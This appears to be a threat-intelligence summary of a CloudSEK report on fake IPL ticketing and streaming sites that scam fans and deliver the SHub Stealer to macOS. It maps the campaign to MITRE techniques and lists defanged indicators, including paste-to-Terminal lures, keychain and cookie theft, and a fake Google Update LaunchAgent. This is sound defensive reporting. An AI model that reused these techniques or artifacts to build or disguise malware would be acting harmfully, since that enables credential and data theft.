CloudSEK uncovered a large IPL fraud ecosystem involving more than 600 fake ticketing domains and over 400 fake free-streaming sites used to scam fans and deliver malware. The campaigns impersonate trusted platforms, harvest personal and payment data, and deploy the SHub Stealer through malicious streaming redirects that target macOS users. #SHubStealer #BookMyShow #District #IPL #WebCric #Crictime
Keypoints
- CloudSEK identified over 600 fraudulent domains impersonating IPL ticketing platforms to deceive fans.
- More than 400 fake âfree streamingâ sites were found, many acting as malware delivery channels rather than legitimate stream providers.
- The fake ticketing sites mimic trusted brands such as BookMyShow and District, using urgency tactics like countdown timers and limited-seat banners.
- An exposed admin panel revealed real-time booking management, manual payment verification, dynamic price controls, and automated fake ticket generation.
- Victim data such as names, phone numbers, and email addresses is collected and may be reused or sold for secondary scams.
- Streaming-related redirects can lead macOS users into ClickFix-style lures that deploy the SHub Stealer infostealer.
- The SHub Stealer targets passwords, browser data, crypto wallets, Telegram sessions, keychains, and other sensitive files while maintaining persistence.
MITRE Techniques
- [T1566.002] Spearphishing Link â Victims are lured through deceptive links in social media posts, ads, and messages that lead to fake ticketing or streaming pages [âusers are pushed through Instagram and Facebookâ, âposted as helpful âfree streamâ linksâ]
- [T1204.001] User Execution: Malicious Link â The attack relies on users clicking buttons, links, or installer pages that start the malicious redirect chain [âthe moment you click anythingâ, âpaste the command to complete the installationâ]
- [T1059.004] Command and Scripting Interpreter: Unix Shell â A malicious command is pasted into Terminal and piped to zsh to execute the loader [âpaste the commandâ, âretrieved from the C2 and piped directly to zsh for executionâ]
- [T1027] Obfuscated Files or Information â The payload is Base64-encoded and Gzip-compressed to hide its purpose before execution [âBase64-encoded, Gzip-compressed second-stage loaderâ]
- [T1057] Process Discovery â The malware fingerprints the victim system by checking host and system details before proceeding [âcollecting the hostname, macOS version, external IP addressâ]
- [T1082] System Information Discovery â The loader gathers device and OS information, including keyboard layout and macOS version [âcollecting the hostname, macOS version, external IP address, and keyboard layout informationâ]
- [T1016] System Network Configuration Discovery â The malware checks the external IP address as part of environment profiling [âexternal IP addressâ]
- [T1036] Masquerading â The campaign impersonates legitimate brands and system pages, including ticketing sites, GitHub installers, and Apple security updates [âimpersonating Districtâ, âimpersonating a legitimate GitHub application installer or an Apple macOS security update pageâ]
- [T1110.001] Brute Force: Password Guessing â The stealer repeatedly prompts for the macOS login password through a fake system dialog [âasks the user to enter their password up to 10 timesâ]
- [T1555.001] Credentials from Password Stores â The malware attempts to extract the Chrome master password and access stored credentials [âtries to extract the Chrome master passwordâ]
- [T1005] Data from Local System â The malware collects browser files, documents, keychains, notes, and other local data [âcopies sensitive files such as Login Data, Cookies, Web Data, Historyâ, âsteals the entire Keychain directoryâ]
- [T1185] Browser Session Cookie Theft â It specifically targets cookies from browsers and Safari to hijack sessions [âCookiesâ, âSafari cookiesâ]
- [T1119] Automated Collection â The file grabber automatically collects documents and images from common user folders [âcollects documents ⌠and PNG images from Desktop and Documents foldersâ]
- [T1560.001] Archive Collected Data: Archive via Utility â Stolen files are compressed into a zip archive before exfiltration [âThe script creates a zip archiveâ]
- [T1041] Exfiltration Over C2 Channel â Collected data is uploaded to the command-and-control server [âThe archive is uploaded to C2â]
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder â Persistence is achieved through a LaunchAgent and a fake Google Update service that runs periodically [âinstalling a LaunchAgent (com.google.keystone.agent.plist)â, âruns every 60 secondsâ]
- [T1055] Process Injection â The malware executes the AppleScript in memory with redirected streams to remain hidden [âexecuted directly in memoryâ, âall standard input, output, and error streams redirected to /dev/nullâ]
- [T1090] Proxy: External Proxy â The infrastructure uses ad brokers, redirects, and routing logic to move victims through multiple intermediary domains [âredirect chain through several shady ad broker domainsâ]
Indicators of Compromise
- [Domains ] fake IPL ticketing and streaming infrastructure â bookmyshow-ipl-ticket[.]com, ipl2026-ticket[.]online, and 18 more suspicious domains
- [Domains ] unofficial streaming and redirect destinations â go.webcric.com, crictime[.]com, and similar platforms mentioned in the analysis
- [File names ] malicious macOS payload and persistence artifacts â com.google.keystone.agent.plist, /tmp/.c.sh
- [File paths ] temporary storage and collected-data staging â /tmp/shub_/, /tmp/.c.sh
- [File hashes ] obfuscated payloads and second-stage loaders â the article references multiple payload files, including a Base64-encoded loader and a large AppleScript payload, but does not provide hashes
- [Email / PDF artifacts ] fake ticket delivery objects â fraudulent PDF tickets sent by email after payment